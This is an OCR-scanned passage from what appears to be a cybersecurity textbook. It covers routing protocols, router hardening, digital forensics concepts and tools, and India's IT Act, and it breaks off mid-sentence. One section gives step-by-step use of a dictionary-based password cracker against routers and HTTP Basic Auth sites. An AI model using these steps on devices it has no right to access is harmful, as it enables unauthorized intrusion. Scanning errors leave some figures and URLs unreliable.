192.168.4.10/24 

0B-20 


Trailer 




A day in a life of a packet: Step 2 


192.168.1.0/24 

.1 


L — 

Fa0/0 ^F« 


192.168.2.0/24 

1 .2 


192.168.3.0/24 


192.168.4.0/24 


FaO/O 

192.168.1.10/24 00-10 

0A-10 


Fa0/1 

00-20 


FaO/O 

OB-31 


' 


-7 2 

SO/O/O so/o/o 


^ — EL, 

r "^Fa0/0 


192.168.4.10/24 
0B-20 


Layer 2 Data Link Frame Packet's Layer 3 data 



192.168.1.0/24 192.168.2.0/24 

i 

FaO/O 1 ™FaU/1 FaO/O 

00-10 00-20 OB-31 

192.168.1.10 

0A-10 



192.168.3.0/24 
.1 

I so/o/o"^ 


192.168.4.0/24 


fcz — 

so/o/o * ^ Fa0/0 

0C-22 


192.168.4.10 

0B-20 


Layer 2 Data Link Frame Packet’s Layer 3 data 




Type 

Dest. IP 

Source IP 

IP fields 

Data 

Trailer 



800 

192.168.4.10 

192.168.1.10 






IP Routing protocol 

• RIP (Routing Information Protocol) 

• IGRP (Interior Gateway Routing Protocol) 

• EIGRP (Enhanced IGRP) 

• OSPF (Open Shortest Path First) 

• IS-IS (Intermediate System-to-lntermediate System) 

• BGP (Border Gateway Protocol) 


Routing Protocols 

• Routing protocols can be classified into different groups 
according to their characteristics 

- Interior Gateway Protocols (IGP) 

- Exterior Gateway Protocols (EGP) 


IGP vs. EGP Routing Protocols 


Exterior Gateway 
Protocol: 

• BGP 



System 100 Interior Gateway System 200 


Protocols: 

• RIP 

• IGRP 

• EIGRP 

• OSPF 

• IS-IS 

J 


IGP Routing Protocols 

Two classes of routing protocols: 

• Distance vector 

- Determines the direction and distance to any link in the internetwork 

• Link-state 

- Recreates the exact topology of the entire internetwork 


Distance Vector Routing Protocol 

• Periodic updates 

• Slow convergence 

• Routing table from directly connected neighbor routers 

• Add distances before passing it to other neighbors 

• Distance is defined in terms of a metric, such as hop count 

Link-state Routing Protocol 

Complex database of topology information 

• Knowledge of the entire network 

• Uses SPF to calculate the best path 

• Updates when changes in the topology occurs 

• Fast Convergence 

• More memory and processor overhead 

Classful Routing Protocols 

• Do not send subnet mask information in routing updates 

• Do not support variable length subnet masks (VLSM) and discontiguous 
Networks 


Classless Routing Protocols 

• Include the subnet mask in routing updates 

• Supports both VLSM and discontiguous networks 

• Required in most networks today 

Classful vs. Classless Routing 


Classful vs. Classless Routing 


172.16.1.0/?'* 



172.16.2.0/24 / \ 172.16.6.0/24 


172.16.3.0/24 


172.16.5.0/24 


172.16.4.0/24 

Classful: Subnet mask is the same throughout the topology 

172.1 6.1. 64/° 7 



192.168.1.0/30 


172.16.1.32/27 


172.16.1.96/27 


192.168.1.8/30 

Classless: Subnet mask can vary in the topology 


Administrative Distance 

• Administrative distance is used to determine the best path to a particular 
destination, when the same path is learned from two or more different 
routing sources 


Measures the trustworthiness of a routing source 
Lowest AD is inserted in the routing table 


Protocols 

Default Administrative Distances 

Connected 

0 

Static 

1 

EIGRP summary route 

5 

eBGP 

20 

EIGRP (Internal) 

90 

IGRP 

100 

OSPF 

110 

IS-IS 

115 

RIP 

120 

EIGRP (External) 

170 

iBGP (external) 

200 


Default Routes 

• Used when the router is unable to match a destination network 

• Do not have to maintain a routing table entry for every Internet network 

• Statically entered by an administrator 

- ip route 0.0. 0.0 0.0. 0.0 

• Dynamically learned using a routing protocol 

- ip default-network 


30. Router Bypassing 


Router Password Kracker is a free software to recover the lost password of your 
Router. It can also be used to recover password from your internet Modem or Web 
sites which are protected by HTTP BASIC Authentication. 


Generally Routers or Modems control their access by using HTTP BASIC 
authentication mechanism. In simple words, when you connect to your 
Modem/Router from the browser (typically http://192.168. 1.1) you will be asked 
to enter username & password. If you ever forget this password then you will not 
be able to access your Router/Modem configuration. Even some websites use this 
BASIC Authentication to allow only certain users to access their site. 

In these cases 'Router Password Kracker' can help you in quickly recovering your 
lost password. Also Penetration Testers and Forensic Investigators can find this 
tool very useful in cracking the Router/Modem/Website password. 


'Router Password Kracker' uses simple Dictionary based password recovery 
technique. By default it comes with sample dictionary file suitable for Routers. 
However you can find good collection of password dictionaries (also called 
wordlists) here & here . 

For complex passwords, you can use tools like Crunch , Cupp to generate brute- 
force based or any custom password list file and then use it with 'Router Password 
Kracker'. 

It works on both 32 bit & 64 bit windows systems starting from Windows XP to 

new Windows 10 version. 


Installation & Un-installation 


Router Password Kracker comes with Installer to help in local installation & un- 
installation. This installer has intuitive wizard which guides you through series of 
steps in completion of installation. 


[Windows 32 bit] 

C:\Program Files\SecurityXploded\RouterPasswordKracker 
[Windows 64 bit] 

C:\Program Files (x86)\SecurityXploded\RouterPasswordKracker 


How to use? 

Here are simple steps 

• Install 'Router Password Kracker' on any system. 

• Enter the IP Address of the Router/Modem/Website whose login password 
you want to recover. 

• Then enter the username (Example: admin, user, support etc) 

• Next select the password dictionary file by clicking on Browse button or 
simply drag & drop it. You can find a sample dictionary file in the installed 


location. 



Finally click on 'Start Crack' to start the Router Password recovery. 


• During the operation, you will see all statistics being displayed on the 
screen. Message box will be displayed on success. 

• At the end, you can generate detailed report in HTML/XML/Text format by 
clicking on 'Report' button and then select the type of file from the drop 
down box of 'Save File Dialog'. 

Screenshots - 

Screenshot 1: Router Password Kracker is showing the recovered Password of 

Router at 192.168.1.1 




Screenshot 2: Detailed Password Recovery report generated by Router Password 
Kracker 



31. Router Security 


Secure Router Configuration - 

• Change the password used to access the router. Anything but the default is OK. 


• Turn off WPS 


• Wi-Fi security should be WPA2 with AES (do not use TKIP) 

• The Wi-Fi passwords need to be long enough to stall brute force attacks. 
Opinions on the minimum length differ, my best guess is that 14 characters should 
be sufficient. A totally random password is not necessary, "999yellowtulips" is 
both long enough and easy to remember. 

• Turn off Remote Administration (its probably off already) 

• If any of your Wi-Fi networks (a router can create more than one) use the default 
name (a.k.a. SSID) then change it. Also, if they use a name that makes it obvious 
that the network belongs to you, then change it. 

• Test the firewall in the router at Steve Gibson's ShieldsUP! site. Start with the 
Common Ports test but also do the All Service Ports test. Finally, do the Instant 
UPnP Exposure Test (orange button). 

• Use a Guest Network whenever possible. Any computer running Windows 10 
should never be allowed on the main network, always restrict them to a Guest 
Network. 

• For extra credit, turn off UPnP. If it breaks something, and port forwarding is 
beyond your ability, then you have a choice to make. 

• Periodically update the firmware and eat your vegetables 


Secure Router Configuration in Detail 




• Suggestions for setting up a new router 


• Setting a good router password (not WiFi password) is almost always the best 
first step for both new and existing routers 

• Selecting a unpopular range of IP Addresses helps prevent many router attacks 

• Don't let DHCP give out the full range of available IP addresses. Reserve some 
for static assignment. 

• Turning off features you are not using reduces the attack surface (added June 18, 
2015) 

• Be smart about choosing an SSID/network name (added July 1 1, 2015) 

• There is more to encryption than just choosing WPA2 (added July 13, 2015) 

• Of course, upgrade the firmware (added Aug 19, 2015) 

• MUCH more to come 


32. Cyber Forensics 


Introduction - 

Where as computer forensics is defined as “the collection of 
techniquesand tools used tofind evidence in a computer”, 


• digital forensics has been defined as “the use of scientifically derived 
and proven methods toward the preservation, collection, validation, 
identification, analysis, interpretation, documentation, and presentation of 
digital evidence derived from digital sources for the purpose of facilitation or 
furthering the reconstruction of events found to be criminal, or helping to 
anticipate unauthorized actions shown to be disruptive toplannedoperations 


What is Cyberforensics? 

. This really depends on the point of view . . . 

. Traditionally Cyber Forensics involves the 

- preservation, 

- collection, 

- validation, 

- identification, 

- analysis, 

- interpretation, 

- documentation and 

- presentation 

• . . .of computer evidence stored on a computer . . . 

• “Forensics is the application of science to the 
legal process.” 

- Jim Christy, DDCI 


View Point 




Law 

Enforcement 


Courts 


Digital \ 
Forensic 
Research 


^/Critical 

Infrastructure 

Protection 


ormation 

/Varfare 


Military Operations 


usiness and 
Industry^ 


Viewpoint - 

• Each perspective has different objectives, even though there is overlap, 
the approaches of each remain mainly ah-hoc and uncoordinated 

• Technology is vendor-driven 

• No industry certification 

• No standards 

- ASCLAD - for labs 

• Interesting situations with the court system 

- Who is more believable? 

- Evidence isn’t questioned 


Coverage from OS perspective 

• Windows 

- 95% of cases involve Windows (FBI) 

- Topics 


• File systems: FAT & NTFS 

• Multiple tools: 

- Commercial 

- Freeware 

» Windows & Linux 

• Live response 

• Network forensics 


Cybercrime & Cyberwarfare - 

• “Information warfare specialists at the Pentagon estimate that a 
properly prepared and wellcoordinated attack by fewer than 30 computer 
virtuosos strategically located around the world, with a 

budget of less than $10 million, could bring the United States to its 
knees.” 

• “Such a strategic attack, mounted by a cyberterrorist group, either 
substate or nonstate actors, would shut down everything from electric 
power grids to air traffic control centers.” 


Chain-of-custody 

• How to bag & tag electronic evidence? 

- Cryptographic hash of the electronic file 

- More on this stuff a bit later 

- Time & date stamp before and after capture 




Handling Evidence 

• Chain-of-Custody 

- Goal is to protect the integrity of your evidence 

- Make it difficult for the defense attorney to 
successfully argue that the evidence was tampered 
with it while it was in your custody 

• Document following questions 

- Who collected the evidence? 

- How was it collected? From where was it collected? 

- Who took possession of it? 

- How was it stored and protected in storage? 

- Who took it out of storage and why? 


Formulate/Execute Response Strategy 

• Incident: 

-DOS 

• Example 

- SMURF attack 



• Strategy 

- Reconfigure router to minimize effect of flooding 

- Establishing perpetrator too costly 

• Likely outcome 

- Reconfiguration reduces effect of flooding 


• Incident: 

- Unauthorized use 

• Example 

- KPorn surfing from company workstation 

• Strategy 

- Perform forensic duplication 

- Offline analysis 

- Interview user 

• Likely outcome 

- Suspect identified and evidence collected for disciplinary action. 


• Incident: 

- Computer intrusion 

• Example 

- Buffer-overflow gives intruder root access to critical system 

• Strategy 

- Monitor intruder activities 

- Isolate the machine, reduce problem scope 

- Secure and recover the system 



• Likely outcome 

- Vulnerability identified, system recovered. 

• Incident: 

- Stolen information 

• Example 

- Stolen CC numbers from company database 

• Strategy 

- Issue public statement 

- Perform forensic duplication & analysis 

- Contact LE 

• Likely outcome 

- LE agents participate in investigation 

- Systems offline until problem resolved. 


Authenticate the Evidence 

• It is difficult to show that evidence of any kind collected is the same as 
what was left behind by a criminal 

- Computer drives deteriorate slowly 

- Child pornography and Taliban terror plans don’t show up randomly on 
HD 

- Chain of custody and other handling rules assure the jury that no 
unanticipated or introduced changes occurred. 


- “prove who was at the keyboard” problem 



Investigation 

• Answers 

-Who, what, when, where, how... 

- How you perform the investigation determined by whether you have a 
forensic duplicate, or whether you are conducting a live response. 

• IE. .Can’t get certain portions of a hard disk if working with live-response 

• ...Can’t do a string search on a swap file under live-response 


Investigation 

• What is the goal? 

- Search for appropriate types of information 

• Graphics/images 

• Text 

- Problems: 

• There are hundreds or thousands of files 

• “Needle in a stack of needles” problem 

• Files can be hidden 

- Kiddy porn graphic saved as “myhomework.doc” 

- Steganography or alternate data streams 

- Files deleted 

- .files 

- Hidden areas of disk 

- obfuscation 


Why HEX? 



• While hex is less readable than ascii text, it is more readable than 
code the machine understands... 

-The number 65535 would be written down as 16 ones, or 
11111111111111112 

- Prone to error... was that 16 or 17 1’s? 

-To condense the same information we use a base 1 6 system, called 

hexadecimal. 


What is HEX? 

• Hex uses decimals first, fol lowed by alphabetic characters. 

• It is fairly straightforward to convert back and forth from binary to hex 


Converting 

• If you write down 1234, (base 10) you are talking about the number 
one thousand, two hundred and thirty four. 

• This can be rewritten as: 



1 * 10 A 3 

2 * 10 A 2 

3 * 10 A 1 

4 * 10 A 0 


• It is the same in all other bases, 
each place represents a power of 
the base: 


961010 would be 0x1234 will be 


1 * 2 A 3 
0 * 2 A 2 
1 * 2 A 1 
0 * 2 A 0 


1 * 16 A 3 

2 * 16 A 2 

3 * 16 A 1 

4 * 16 A 0 


• What is OxCB in Decimal? 

• C = 12 and B = 11 so 

12 * 1 6 A 1 + 11 * 1 6 A 0 = 203 

What about binary? 

C = 12 = 1100 B = 11 = 1011 
CB = 1100 .1011 

so OxCB = %1 1001 011 


What is OxAFI in Decimal? 


•A= 10, F = 1 5 so 

10* 1 6 A 2 + 15* 1 6 A 1 + 1 * 1 6 A 0 = 2801 

What about binary? 

A = 1010 F = 1 1 1 1 1 = 0001 
AF1 = 1010 .1111 . 0001 
so OxAFI = %1 0101111 0001 



Hashing 

• ...similarly, a digital hash is a unique representation of a larger object - 
like an image 

• This hash is a file that is completely separate from the image that it is 
fingerprinting and has a fixed length - like 1 28 or 1 60 bits. 

• A 1 MB file and a 1 GB files will both produce hashes of the same length 

• The general idea is that a very small (any) change in the source 
file will result in a very large change in the hash 

• The hashes we are referring to are “one-way” hashes 

• MD5- 128 bits 

• Shal - 160 bits 

• Sha256 - 256 bits 

• ...sha384, sha512 


33. Forensics Tool 


Computer forensics is a very important branch of computer science in relation to 
computer and Internet related crimes. Earlier, computers were only used to produce 



data but now it has expanded to all devices related to digital data. The goal of 
Computer forensics is to perform crime investigations by using evidence from 
digital data to find who was the responsible for that particular crime. 

For better research and investigation, developers have created many computer 
forensics tools. Police departments and investigation agencies select the tools 
based on various factors including budget and available experts on the team. 


These computer forensics tools can also be classified into various categories: 

• Disk and data capture tools 

• File viewers 

• File analysis tools 

• Registry analysis tools 

• Internet analysis tools 

• Email analysis tools 

• Mobile devices analysis tools 

• Mac OS analysis tools 

• Network forensics tools 

• Database forensics tools 


1. Digital Forensics Framework 

Digital Forensics Framework is another popular platform dedicated to digital 
forensics. The tool is open source and comes under GPL License. It can be used 
either by professionals or non-experts without any trouble. It can be used for 
digital chain of custody, to access the remote or local devices, forensics of 
Windows or Linux OS, recovery hidden of deleted files, quick search for files’ 
meta data, and various other things. 

Download: http://www.digital-forensic.org/ 


2. Open Computer Forensics Architecture 

Open Computer Forensics Architecture (OCFA) is another popular distributed 
open-source computer forensics framework. This framework was built on Linux 
platform and uses postgreSQL database for storing data. 

It was built by the Dutch National Police Agency for automating digital forensics 
process. It is available to download under GPL license. 

Download: http://sourceforge.net/proiects/ocfa/ 


3. CAINE 

CAINE (Computer Aided Investigative Environment) is the Linux distro created 
for digital forensics. It offers an environment to integrate existing software tools as 
software modules in a user friendly manner. This tool is open source. 

Read More about it: http://www.caine-live.net/ 


4. X-Ways Forensics 

X-Ways Forensics is an advanced platform for digital forensics exa mi ners. It runs 
on all available version of Windows. It claims to not be very resource hungry and 
to work efficiently. If we talk about the features, find the key features in the list 
below: 

• Disk imaging and cloning 

• Ability to read file system structures inside various image files 

• It supports most of the file systems including FAT12, FAT16, FAT32, 
exFAT, TFAT, NTFS, Ext2, Ext3, Ext4, Next3®, CDFS/ISO9660/Joliet, 
UDF 


Automatic detection of deleted or lost hard disk partition 
Various data recovery techniques and powerful file carving 
Bulk hash calculation 

Viewing and editing binary data structures using templates 

Easy detection of and access NTFS ADS 

Well maintained file header 

Automated activity logging 

Data authenticity 

Complete case management 

Memory and RAM analysis 

Gallery view for pictures 

Internal viewer for Windows registry file 

Automated registry report 

Extracts metadata from various file types 

Ability to extract emails from various available email clients. 

And many more.. 


5. SANS Investigative Forensics Toolkit - SIFT 

SANS Investigative Forensics Toolkit or SIFT is a multi-purpose forensic 
operating system which comes with all the necessary tools used in the digital 
forensic process. It is built on Ubuntu with many tools related to digital forensics. 
Earlier this year, SIFT 3.0 was released. It comes for free or charge and contains 
free open-source forensic tools. 

In a previous post at resource.infosecinstitute.com, we already covered SIFT in 
detail. You can read those posts about SIFT to know more about this digital 
forensics platform. 

Download: http ://digital-forensics . sans . org/community/downloads 


6. EnCase 


EnCase is another popular multi-purpose forensic platform with many nice tools 
for several areas of the digital forensic process. This tool can rapidly gather data 
from various devices and unearth potential evidence. It also produces a report 
based on the evidence. 

This tool does not come for free. The license costs $995. 

Read more about EnCase: 

https://www.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx 


7. Registry Recon 

Registry Recon is a popular registry analysis tool. It extracts the registry 
information from the evidence and then rebuilds the registry representation. It can 
rebuild registries from both current and previous Windows installations. 

It is not a free tool. It costs $399. 

Read more about it: http://arsenalrecon.com/apps/recon/ 


8. The Sleuth Kit 

The Sleuth Kit is a Unix and Windows based tool which helps in forensic analysis 
of computers. It comes with various tools which helps in digital forensics. These 
tools help in analyzing disk images, performing in-depth analysis of file systems, 
and various other things. 

Read more about it here: http://www.sleuthkit.org/ 


9. Llibforensics 


Libforensics is a library for developing digital forensics applications. It was 
developed in Python and conies with various demo tools to extract information 
from various types of evidence. 

Read more here: http://code.google.eom/p/libforensies/ 


10. Volatility 

Volatility is the memory forensics framework. It used for incident response and 
malware analysis. With this tool, you can extract information from running 
processes, network sockets, network connection, DLLs and registry hives. It also 
has support for extracting information from Windows crash dump files and 
hibernation files. This tool is available for free under GPL license. 

Read more about the tool: http://code.google.eom/p/volatility/ 


11. WindowsSCOPE 

WindowsSCOPE is another memory forensics and reverse engineering tool used 
for analyzing volatile memory. It is basically used for reverse engineering of 
malwares. It provides the capability of analyzing the Windows kernel, drivers, 
DLLs, virtual and physical memory. 

Read more: 

http://www.windowsscope.com/index.php?page=shop.product details &flypage=fl 

ypage.tpl&product id=35&category id=3&option=com virtuemart 


12. The Coroner’s Toolkit 


The Coroner’s Toolkit or TCT is also a good digital forensic analysis tool. It runs 
under several Unix-related operating systems. It can be used to aid analysis of 
computer disasters and data recovery. 

Read more: http://www.porcupine.org/forensics/tct.html 


13. Oxygen Forensic Suite 

Oxygen Forensic Suite is a nice software to gather evidence from a mobile phone 
to support your case. This tool helps in gathering device information (including 
manufacturer, OS, IMEI number, serial number), contacts, messages (emails, SMS, 
MMS), recover deleted messages, call logs and calendar information. It also lets 
you access and analyze mobile device data and documents. It generates easy to 
understand reports for better understanding. 

More information here: http://www.oxygen-forensic.com/en/features 


14. Bulk Extractor 

Bulk Extractor is also an important and popular digital forensics tool. It scans the 
disk images, file or directory of files to extract useful information. In this process, 
it ignores the file system structure, so it is faster than other available similar kinds 
of tools. It is basically used by intelligence and law enforcement agencies in 
solving cyber crimes. 

Download it here: http://digitalcorpora.org/downloads/bulk extractor/ 


15. Xplico 

Xplico is an open source network forensic analysis tool. It is basically used to 
extract useful data from applications which use Internet and network protocols. It 
supports most of the popular protocols including HTTP, IMAP, POP, SMTP, SIP, 
TCP, UDP, TCP and others. Output data of the tool is stored in SQLite database of 
MySQL database. It also supports IPv4 and IPv6 both. 

Read more about this tool here: http://www.xplico.org/about 


16. Mandiant RedLine 

Mandiant RedLine is a popular tool for memory and file analysis. It collects 
information about running processes on a host, drivers from memory and gathers 
other data like meta data, registry data, tasks, services, network information and 
Internet history to build a proper report. 

Read more here: https://www.mandiant.com/resources/download/redline 


17. Computer Online Forensic Evidence Extractor (COFEE) 

Computer Online Forensic Evidence Extractor or COFEE is a tool kit developed 
for computer forensic experts. This tool was developed by Microsoft to gather 
evidence from Windows systems. It can be installed on a USB pen drive or 
external hard disk. Just plug in the USB device in the target computer and it starts a 
live analysis. It comes with 150 different tools with a GUI based interface to 
command the tools. It is fast and can perform the whole analysis in as few as 20 
minutes. To law enforcement agencies, Microsoft provides free technical support 
for the tool. 

Official website: https://cofee.nw3c.org/ 


18. P2 eXplorer 


P2 eXplorer is a forensic image mounting tool which aims to help investigating 
officers with examination of a case. With this image, you can mount forensic 
images as a read-only local and physical disc and then explore the contents of the 
image with file explorer. You can easily view deleted data and unallocated space 
of the image. 

It can mount several images at a time. It supports most of the image formats 
including EnCasem, safeBack, PFR, FTK DD, Winlmage, Raw images from Linux 
DD, and VMWare images. It supports both logical and physical image types. 

This tool comes for $199, but you can grab the limited feature version of the tool 
for free. 

Read more here: https://www.paraben.com/p2-explorer.html 


19. PlainSight 

PlainSight is another useful digital forensics tool. It is a CD based Knoppix which 
is a Linux distribution. Some of its uses include viewing Internet histories, data 
carving, checking USB device usage, memory dumps extracting password hashes, 
information gathering, examining Windows firewall configuration, seeing recent 
documents, and other useful tasks. For using this too, you only need to boot from 
the CD and the follow the instructions. 

This tool is available for free. 

Read more here: http://www.plainsight.info/index.html 


20. XRY 


XRY is the mobile forensics tool developed by Micro Systemation. It is used to 
analyze and recover crucial information from mobile devices. This tool comes with 
a hardware device and software. Hardware connects mobile phones to PC and 
software performs the analysis of the device and extract data. It is designed to 
recover data for forensic analysis. 

The latest version of the tool can recover data from all kind of smartphones 
including Android, iPhone and BlackBerry. It gathers deleted data like call records, 
images, SMS and text messages. 

Read more about it: http://www.msab.com/xrv/what-is-xry 


21. HELIX3 

HELIX3 is a live CD-based digital forensic suite created to be used in incident 
response. It comes with many open source digital forensics tools including hex 
editors, data carving and password cracking tools. If you want the free version, you 
can go for Helix3 2009R1. After this release, this project was overtaken by a 
commercial vendor. So, you need to pay for most recent version of the tool. 

This tool can collect data from physical memory, network connections, user 
accounts, executing processes and services, scheduled jobs, Windows Fegistry, 
chat logs, screen captures, SAM files, applications, drivers, environment variables 
and Internet history. Then it analyzes and reviews the data to generate the 
complied results based on reports. 

Helix3 2008R1 can be downloaded here: https ://e- 
fenseine.sharefile.eom/d/sda4309a624d48b88 


The enterprise version is available here: http://www.e-fense.com/h3-enterprise.php 


34. IT Act And Cyber Law 


What is Cyber Law? 

Cyber Law is the law governing cyber space. Cyber space is a very wide 
term and includes computers, networks, software, data storage devices 
(such as hard disks, USB disks etc), the Internet, websites, emails and 
even electronic devices such as cell phones, ATM machines etc. 


Law encompasses the rules of conduct: 

1 . that have been approved by thegovernment, and 

2. which are in force over a certainterritory, and 

3. which must be obeyed by all personson that territory. 


Cyber law encompasses laws relating to: 

1 . Cyber Crimes 

2. Electronic and Digital Signatures 

3. Intellectual Property 

4. Data Protection and Privacy 


Cyber crimes are unlawful acts where the computer is used 
either as a tool or a target or both. The enormous growth in 
electronic commerce (e-commerce) and online share trading has 
led to a phenomenal spurt in incidents of cyber crime. These 
crimes are discussed in detail further in this chapter. A 



comprehensive discussion on the Indian law relating to cyber 
crimes and digital evidence is provided in the ASCL publication 
titled “Cyber Crimes & Digital Evidence - Indian Perspective”. 


Electronic signatures are used to authenticate electronic 
records. Digital signatures are one type of electronic signature. 
Digital signatures satisfy three major legal requirements - signer 
authentication, message authentication and message integrity. 
The technology and efficiency of digital signatures makes them 
more trustworthy than hand written signatures. These issues are 
discussed in detail in the ASCL publication titled “Ecommerce - 
Legal Issues”. 


Intellectual property is refers to creations of the human mind e.g. 
a story, a song, a painting, a design etc. The facets of 
intellectual property that relate to cyber space are covered by 
cyber law. 


These include: 

• copyright law in relation to computer software, computersource code, 
websites, cell phone content etc, 

• software and source code licences 

• trademark law with relation to domain names, meta tags, mirroring, 
framing, linking etc 

• semiconductor law which relates to the protection ofsemiconductor 
integrated circuits design and layouts, 



• patent law in relation to computer hardware and software.These issues 
are discussed in detail in the ASCL publicationtitled “IPR & Cyberspace - 
the Indian Perspective”. 

Data protection and privacy laws aim to achieve a fair balancebetween 
the privacy rights of the individual and the interests ofdata controllers such 
as banks, hospitals, email service providersetc. These laws seek to 
address the challenges to privacy causedby collecting, storing and 
transmitting data using newtechnologies. 


Need for Cyber Law 

There are various reasons why it is extremely difficult for conventional 
law to cope with cyberspace. Some of these are discussed below. 


1 . Cyberspace is an intangible dimension that is impossible to 
govern and regulate using conventional law. 

2. Cyberspace has complete disrespect for jurisdictional 
boundaries. A person in India could break into a bank’s 
electronic vault hosted on a computer in USA and transfer 
millions of Rupees to another bank in Switzerland, all within 
minutes. All he would need is a laptop computer and a cell phone. 

3. Cyberspace handles gigantic traffic volumes every second. 

Billions of emails are crisscrossing the globe even as we read 
this, millions of websites are being accessed every minute and 
billions of dollars are electronically transferred around the world 
by banks every day. 



4. Cyberspace is absolutely open to participation by all. A tenyear- 
old in Bhutan can have a live chat session with an eightyear- 

old in Bali without any regard for the distance or the 
anonymity between them. 

5. Cyberspace offers enormous potential for anonymity to its 

members. Readily available encryption software and 
steganographic tools that seamlessly hide information within 
image and sound files ensure the confidentiality of information 
exchanged between cyber-citizens. 

6. Cyberspace offers never-seen-before economic efficiency. 
Billions of dollars worth of software can be traded over the 
Internet without the need for any government licenses, shipping 
and handling charges and without paying any customs duty. 

7. Electronic information has become the main object of cyber 
crime. It is characterized by extreme mobility, which exceeds by 
far the mobility of persons, goods or other services. International 
computer networks can transfer huge amounts of data around the 
globe in a matter of seconds. 

8. A software source code worth crores of rupees or a movie can be 
pirated across the globe within hours of their release. 

9. Theft of corporeal information (e.g. books, papers, CD ROMs, 
floppy disks) is easily covered by traditional penal provisions. 
However, the problem begins when electronic records are copied 
quickly, inconspicuously and often via telecommunication 
facilities. Here the “original” information, so to say, remains in the 

“possession” of the “owner” and yet information gets stolen. 



Jurisprudence of Indian Cyber Law 


Note: The Act, rules, regulations, orders etc referred to 

in this section are discussed in more detail in theChapter 3 titled 

“Introduction to Indian Cyber Law”. 


The primary source of cyber law in India is the Information Technology 
Act, 2000 (IT Act) which came into force on 17 October 2000. 


The primary purpose of the Act is to provide legal 
recognition to electronic commerce and to facilitate 
filing of electronic records with the Government. 

The IT Act also penalizes various cyber crimes and 
provides strict punishments (imprisonment terms upto 10 
years and compensation up to Rs 1 crore). 

An Executive Order dated 12 September 2002 contained 
instructions relating provisions of the Act with regard to 
protected systems and application for the issue of a Digital 
Signature Certificate. 

Minor errors in the Act were rectified by the Information 
Technology (Removal of Difficulties) Order, 2002 
which was passed on 19 September 2002. 



The IT Act was amended by the Negotiable Instruments 
(Amendments and Miscellaneous Provisions) Act, 

2002. This introduced the concept of electronic cheques 
and truncated cheques. 

Information Technology (Use of Electronic Records 
and Digital Signatures) Rules, 2004 has provided the 
necessary legal framework for filing of documents with the 
Government as well as issue of licenses by theGovernment. 

It also provides for payment and receipt of fees in relationto the 
Government bodies. 


On the same day, the Information Technology (Certifying Authorities) 
Rules, 2000 also came into force. 

These rules prescribe the eligibility, appointment and 
working of Certifying Authorities (CA). These rules also lay 
down the technical standards, procedures and security 
methods to be used by a CA. 

These rules were amended in 2003, 2004 and 2006. 


Information Technology (Certifying Authority) 
Regulations, 2001 came into force on 9 July 2001 . They 
provide further technical standards and procedures to be 
used by a CA. 

Two important guidelines relating to CAs were issued. The 
first are the Guidelines for submission of application for 
license to operate as a Certifying Authority under the IT 
Act. These guidelines were issued on 9th July 2001 . 



Next were the Guidelines for submission of certificates 
and certification revocation lists to the Controller of 
Certifying Authorities for publishing in National Repository 
of Digital Certificates. These were issued on 16th 
December 2002. 


The Cyber Regulations Appellate Tribunal (Procedure) Rules, 2000 
also came into force on 17th October 2000. 

These rules prescribe the appointment and working of the 
Cyber Regulations Appellate Tribunal (CRAT) whose 
primary role is to hear appeals against orders of the 
Adjudicating Officers. 

The Cyber Regulations Appellate Tribunal (Salary, 

Allowances and other terms and conditions of service 
of Presiding Officer) Rules, 2003 prescribe the salary, 
allowances and other terms for the Presiding Officer of the 
CRAT. 

Information Technology (Other powers of Civil Court 
vested in Cyber Appellate Tribunal) Rules 2003 
provided some additional powers to the CRAT. 

On 17th March 2003, the Information Technology (Qualification and 
Experience of Adjudicating Officers and Manner of Holding Enquiry) 
Rules, 2003 were passed. 

These rules prescribe the qualifications required for 
Adjudicating Officers. Their chief responsibility under the 
IT Act is to adjudicate on cases such as unauthorized 
access, unauthorized copying of data, spread of viruses, 
denial of service attacks, disruption of computers, 
computer manipulation etc. 



These rules also prescribe the manner and mode of 
inquiry and adjudication by these officers. 


The appointment of adjudicating officers to decide the fate of multi-crore 
cyber crime cases in India was the result of the public interest litigation 
filed by students of Asian School of Cyber Laws (ASCL). 


The Government had not appointed the Adjudicating Officers or the 
Cyber Regulations Appellate Tribunal for almost 2 years after the 
passage of the IT Act. This prompted ASCL students to file a Public 
Interest Litigation (PIL) in the Bombay High Court asking for a 
speedyappointment of Adjudicating officers. 

The Bombay High Court, in its order dated 9th October 2002, directed the 
Central Government to announce the appointment of adjudicating officers 
in the public media to make people aware of the appointments. The 
division bench of the Mumbai High Court consisting of Hon’ble Justice 
A.P. Shah and Hon’ble Justice Ranjana Desai also ordered that the 
Cyber Regulations Appellate Tribunal be constituted within a reasonable 
time frame. 

Following this the Central Government passed an order dated 23rd March 
2003 appointing the “Secretary of Department of Information Technology 
of each of the States or of Union Territories” of India as the adjudicating 
officers. 


The Information Technology (Security Procedure) Rules, 2004 came 
into force on 29th October 2004. They prescribe provisions relating to 
secure digital signatures and secure electronic records. 



Also relevant are the Information Technology (Other 
Standards) Rules, 2003. 

An important order relating to blocking of websites was passed on 
27th February, 2003. 

Computer Emergency Response Team (CERT-IND) can 
instruct Department of Telecommunications (DOT) to 
block a website. 

The Indian Penal Code (as amended by the IT Act) penalizes several 
cyber crimes. These include forgery of electronic records, cyber frauds, 
destroying electronic evidence etc. 

Digital Evidence is to be collected and proven in court as per the 
provisions of the Indian Evidence Act (as amended by the IT Act). 

In case of bank records, the provisions of the Bankers’ Book Evidence 
Act (as amended by the IT Act) are relevant. 

Investigation and adjudication of cyber crimes is done in accordance with 
the provisions of the Code of Criminal Procedure and the IT Act. 

The Reserve Bank of India Act was also amended by the IT Act. 


Evolution of key terms and concepts- 
Computer - 

(According to section 2(1 )(i) of the IT Act) 

"computer" means any electronic magnetic, optical or other 
high-speed data processing device or system which performs 
logical, arithmetic, and memory functions by manipulations of 



electronic, magnetic or optical impulses, and includes all input, 
output, processing, storage, computer software, or 
communication facilities which are connected or related to the 
computer in a computer system or computer network; 

Simply put, a computer has the following characteristics: 

1 . It is a high-speed data processing device or system. 

2. It may be electronic, magnetic, optical etc. 

3. It performs logical, arithmetic, and memory functions 

4. These functions are performed by manipulations of electronic, 
magnetic or optical impulses. 

Computer includes 

1 . all input facilities, 

2. all output facilities, 

3. all processing facilities, 

4. all storage facilities, 

5. all computer software facilities, and 

6. all communication facilities 

which are connected or related to the computer in a computer system 
network. 



Magnetic means having the properties of a 
magnet; i.e. of attracting iron or steel e.g. 
parts of a hard disk are covered with a thin 
coat of magnetic material. 

Simply put, an optical computer uses light 
instead of electricity to manipulate, store 
and transmit data. Development of this 
technology is still in a nascent stage. 

Optical data processing can perform 
